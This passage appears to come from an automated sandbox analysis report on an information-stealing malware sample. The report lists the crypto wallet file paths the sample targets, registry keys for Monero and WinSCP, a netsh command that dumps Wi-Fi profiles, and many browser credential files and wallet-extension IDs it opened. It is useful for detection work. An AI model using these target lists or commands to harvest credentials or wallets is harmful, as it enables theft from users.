Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i8Vwc7iOaG.exe, 00000000.00000003.2349019621.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.0000000001210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002B95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.db
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.db
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.db
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.db
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.db
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
